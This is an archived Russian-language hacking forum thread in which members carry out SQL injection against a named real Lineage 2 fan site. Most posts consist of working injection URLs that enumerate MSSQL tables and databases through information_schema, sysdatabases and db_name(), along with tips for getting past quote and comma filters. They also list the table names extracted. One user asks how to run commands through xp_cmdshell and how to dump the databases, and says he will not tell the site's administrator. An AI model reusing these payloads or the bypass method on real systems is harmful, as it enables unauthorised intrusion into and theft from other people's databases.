ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.05.2008, 11:41
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Код HTML:
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+1+table_name+from+information_schema.tables))--
во втором подзапросе перебираем TOP 1,2,3 ...
вот таблички которые я вытащил:
castle_names
manor_crop
manor_procure
henna
exp
item_names
locations
items
manor_manufacture
manor_procure
manor_crop
npc_ability
npc_skills
npc_names
npc_locations
npcs
quests
recipe_ingredients
quest_descriptions
recipes
sa_bonus
sa
set_items
skill_enchant
skill_acquire
skill_names
skills
stats
special_shops
sysconstraints
syssegments
sets
|
|
|
07.05.2008, 11:43
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Там просто стоят фильтры... Которые вырезают кавычки, запятые, знаки сравнения, слово SELECT в верхнем регистре... Ну в общем фильтры они и есть фильтры, правда в нашем случае они вполне обходимые:
Код:
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=@@version--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables)--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna")--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna"+and+table_name!="castle_names")--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name!="henna"+and+table_name!="castle_names"+and+table_name!="classes")--
Обрати внимание, что перечисление таблиц делается не через привычный NOT IN, так как запятая вырезается, а через сцепление условий имя_поля!='значение1' and имя_поля!='значение2' and ...
Вот имена таблиц которые удалось вытащить (это не все):
Код:
henna
castle_names
classes
drops
dtproperties
exp
fish_items
fish_params
item_names
items
locations
В общем дерзай... Просто обход делай не через множество, а через сцепление условий, пускай это будет долго, но зато в обход фильтрации... В принципе можно отсеивать записи пачками используя для каждой ветки and условие NOT LIKE "...". Обрати внимание, что одинарные кавычки тоже вырезаются... |
|
|
|
09.05.2008, 22:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
гдето уже видел такой пример но ищо раз повторю
имена таблиц можно перебирать подзапросом
меняя значение 2го топа: top 1, top 2 итд
Код:
http://trot.telenet.ru/la2info/?part=npcs&id=-35332'+OR+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+2+table_name+from+information_schema.tables))--
вот мы и обошлись без кавычек |
|
|
|
27.06.2008, 03:57
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756
Репутация:
1
|
|
ААФигеть вы умные %)
-=megahertz=-, ну и как ВСЁ удалось ?
1)Я так понимаю, что в этой базе нет таблицы accounts....
2)Выводить сразу большой список не выйдет?
3)А возможно сделать запрос к другой базе на этом же серве(например master)?
Ну киньте плиз пример запроса для чтения полей и их значений в этих таблицах???
4)возможно ли как-то выполнить такой запрос
?part=npcs&id=-35332+OR+1=(exec+master..xp_cmdshell+”ipconfig )
Что я не так делаю?
5)Может есть хотя бы ссылка где это обсуждалось подробно?
6)Можно ли вообще узнать список всех баз на этом сервере как-нибудь(master...northwind и т.д.)?
...плиз...
Последний раз редактировалось NamahS; 27.06.2008 в 09:40..
|
|
|
|
27.06.2008, 10:19
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
1. >нет таблицы accounts
2. >не выйдет . -> перебирать top 1,2,3...
3. почему нет?
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select+top+1+name+from+master..sysdata bases)--
4. -
5.
http://forum.antichat.ru/showthread.php?t=30501
http://forum.antichat.ru/threadedpost747381.html
http://forum.antichat.ru/thread46016.html
+ поиск по форуму
6.
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select+db_name(1))--
http://trot.telenet.ru/la2info/?part=npcs&id=-35332+or+1=(select+db_name(2))--
и т.д ...
вроде так, (если я правильно понял твои вапросы)...
p.s: не надо мне в пм спамить...  |
|
|
|
28.06.2008, 03:27
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756
Репутация:
1
|
|
Мэни-мени сенкс...извини за ПМ.
|
|
|
|
03.07.2008, 11:17
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957
Репутация:
56
|
|
Сообщение от NamahS
ААФигеть вы умные %)
-=megahertz=-, ну и как ВСЁ удалось ?
все отлично удалось! после этого админу рассказал все) если он не дурак то поправил)
|
|
|
|
05.07.2008, 11:17
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756
Репутация:
1
|
|
А я не расскажу )
Нашел ссылки на снятие дампа, но ни одна не работает...Есть рабочая???
И вопрос про exec не раскрыт...)
...через ; надо делать?...не получается что-то...
Последний раз редактировалось NamahS; 05.07.2008 в 11:24..
|
|
|
|
05.07.2008, 12:07
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
всмысле сссылки про снятие дампа? ты нашел раскрученные инъкции но слить инфу не можешь или что?
|
|
|
|
05.07.2008, 13:14
|
|
Новичок
Регистрация: 26.06.2008
Сообщений: 26
Провел на форуме:
79756
Репутация:
1
|
|
Меня интересует Реализация скрипта для просмотра и дампинга баз, через mssql-inj
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
